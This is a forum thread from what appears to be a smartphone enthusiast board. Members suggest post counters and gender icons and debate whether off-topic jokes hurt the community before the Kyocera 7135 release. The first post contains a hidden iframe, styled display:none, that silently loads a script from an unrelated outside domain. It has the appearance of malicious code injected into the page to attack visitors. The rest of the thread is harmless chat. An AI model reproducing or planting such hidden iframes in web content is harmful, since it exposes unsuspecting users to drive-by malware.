+ Reply to Thread

two quick thoughts

1.) with the recent fun we've all had welcoming new members and especially lurkers of both sexes, how about a gender icon (for those who don't mind letting people know) alongside our quick member profile next to each post.

2.) The "junior" portion of my member just fell off and I like my new status but I think it would be cool to see not just how many posts a particular mega-poster (or newbie) has on this 'unhealthy obsession' site but also the cronology of the post you happen to be viewing.

i.e. for me this would not be just Chemo, member, xx posts but Chemo, member post 37 of xx.

Just a thought.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Where does he get all those wonderful toys? -- The Joker (Jack not Cesar)

I have a suggestion and I dont want this board to lose its sense of community, however- I get fustrated when I see a response to a topic and it is totaly off topic-- It would be nice to see some sort of comment on the topic from that persons viewpoint instead of just a comment from outta nowhere. Many of us connect with our phones and we all know how precious our minutes are.

for example:

Thread Poster: Does anybody know how to fix the (blah blah)

Great reply (fact): yes - so&so answered that back in <this link>

Good reply (opinion): you dont want to fix that, wait for the 7135 instead.

Good reply(agreement): I have that prob too, i wonder...

Bad reply: :alieneyes Only earthlings worry about (blah blah)

(No offence intended Zorak)

Maybe If we want to joke (and I do as well) we could offer an opion in our posts as well.

Better reply: I dont have that prob on my version.-- :alieneyes Only earthlings worry about (blah blah)

Many other forums I have used only allow off topic info to be posted as a footer or signature in addition to the post, with moderators keeping the topic on topic.

I am glad we are able to joke and have fun, however with the release of the 7135 emminent and the increasing numbers of new members to the board, we might want to think about being a lil more serious so we dont push any new users away and more importantly if we plan to get any kind of offical sponsership from kyocera or a carrier.

I think this forum is great and I hope it gets even better when the 7135 arrives to make it bigger and stronger. - Its my one stop shop for my mobile palm info!
    iPhone therefore iAm.

Mod-Blog's SmartPhone Correspondent
    Steve,

Good suggestion to the members - it is best when we can try to add value as well as have fun. At the same time, we should keep in mind what has made this forum a success - good info mixed with good fun. I have frequented a number of forums, including many who have the "mostly serious" rule in place. They are very different forums - most quite quality - who lack the sense of friendship and community you see here.

Anyway, a request to tone down the jokes is fine. I admit to having indulged the Mad Scientist a bit too much from time to time - including an obsession with adding pics to my posts. But I would recommend we not ask the mods to step in and suppress them. Doing so would remove much of what brings in and keeps people here in the first place.

Just my two cents.

- Nomad

Originally posted by Steve
    Good reply (opinion): you dont want to fix that, wait for the 7135 instead.
    You just answered your own question Steve! Just wait for the 7135 and then connection speed won't be a big issue

I agree that the joke to opinion ratio is occaisionally out of balance.... but for the most part my favorite thing about this board is the weath of knowledge, as well as the personalities of my board buddies :drink1

Besides, when the 7135 comes out I'm betting that it will pretty much be 100% ON-topic for a while! :clap
    Please visit my picture site: Robert-O-Rama :)

Originally posted by nomad7674
    Steve,

Good suggestion to the members - it is best when we can try to add value as well as have fun. At the same time, we should keep in mind what has made this forum a success - good info mixed with good fun. I have frequented a number of forums, including many who have the "mostly serious" rule in place. They are very different forums - most quite quality - who lack the sense of friendship and community you see here.

Anyway, a request to tone down the jokes is fine. I admit to having indulged the Mad Scientist a bit too much from time to time - including an obsession with adding pics to my posts. But I would recommend we not ask the mods to step in and suppress them. Doing so would remove much of what brings in and keeps people here in the first place.

Just my two cents.

- Nomad
    Here, here...I second that one. Sometime you just hit that area, my old boss when I was an Air Force programmer, called the gigglebyte, and well you just kinda spout off. Ok, sure it may not be eactly on topic, hell may even be way out in left field, but hey, if you don't want to read it, don't. But then guess cuz I do all my reading here at work on my breaks, or at home(both are boardband, sometimes home is alot faster too!!) it doesn't bother me if something is not on topic, or if the whole thread has snapped and we are back to talking about aliens(btw..got to be careful about that in my neck of the woods, too many illeagle aliens here, damn Venusians), but its all good man. I love the laid back atmosphere here!! Thread cops...thread cops...we don't need not stinking thread cops!! As Mork once said..."Fly, be free..." as he toss an egg up, sometimes your bother just bites the big one.

Did that all make sense?? No, oh well...if yes, then you too have hit the gigglebyte like me.
    Rob

Quando Omni Flunkus Moritati (when all else fails, play dead) motto of the Possum Lodge, Chapter 13.(The Red Green Show)

Originally posted by RobNAZ
    I love the laid back atmosphere here!! Thread cops...thread cops...we don't need not stinking thread cops!!
    Yeah, wouldn't it suck if I had to moderate myself? I'm one of the biggest "offenders" around! I think I have some kind of opinion in most of my posts though.

Here is an opinion for you: THE 7135 IS GOING TO ROCK!!!:drummer :guitarist
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Steve
    I get fustrated when I see a response to a topic and it is totaly off topic--
    And your reply would have what exactly to do with Chemo's topic of "two quick thoughts" ???

:mdrbig

(This should fall under the "Better Reply" category, right? I'm addressing the topic, AND using humor).

Well, I thought it was funny anyway....

Praise the Heavens fellas.

Eight weeks of lurking and several more of membership has shown that this site has a unique (and it better stay that way) vibe to it. Most of the best of you would probably fade away if it became all regimented.

I had a long day away from the www and was really looking forward to 1.) seeing if the new Sprint Plans were for true and actual; and 2.) seeing if anyone had commented on my "two quick thoughts"

It looks like Sprint has gone through with a viable plan for our new 7135.

I saw that there were 6 new posts on the thoughts. I was excited because I couldn't wait to see what was said. AND I was thrilled that it sparked something different and unexpected.

Answers are easy to get. Humor, insight and a sense of community are precious and rare.

Don't sweat the little stuff and love the one you're with!

(I'm a friggin' professional sports writer for heavens sake, you'd think I wouldn't have to edit my own stuff so darned much. I'm gonna have to by my favorite copy editor a beer for putting up with my typos)

Chemo, will you please give my brain a rest by explaining this quote: "Where does he get all those wonderful toys?"
    ~'kito
    pdaPhoneHome Moderator

Mod-Blog's SmartPhone Correspondent
    "Where does he get all those wonderful toys?"
    That is a quote from THE JOKER in the original BATMAN movie (the one NOT based on the TV show) referring to Batman's utility belt.

It was also quoted in Kevin Smith's MALLRATS by Jay of Jay-&-Silent-Bob fame, referring to Silent Bob's utility coat which is a parody of BatMan's.

For the record, these images are not are for reference and thus on-topic.

Thanks nomad7674.

Off-topically yours,
    ~'kito
    pdaPhoneHome Moderator

I like the vibe as is, WITH sometimes/frequently off-topic congeniality.

I like Chemo's suggestion of being able to see the chronology and total # of posts (on each post), if that's feasible.

Thanks Nomad! Sorry I didn't get there first 'kito but even Vampire's need sleep.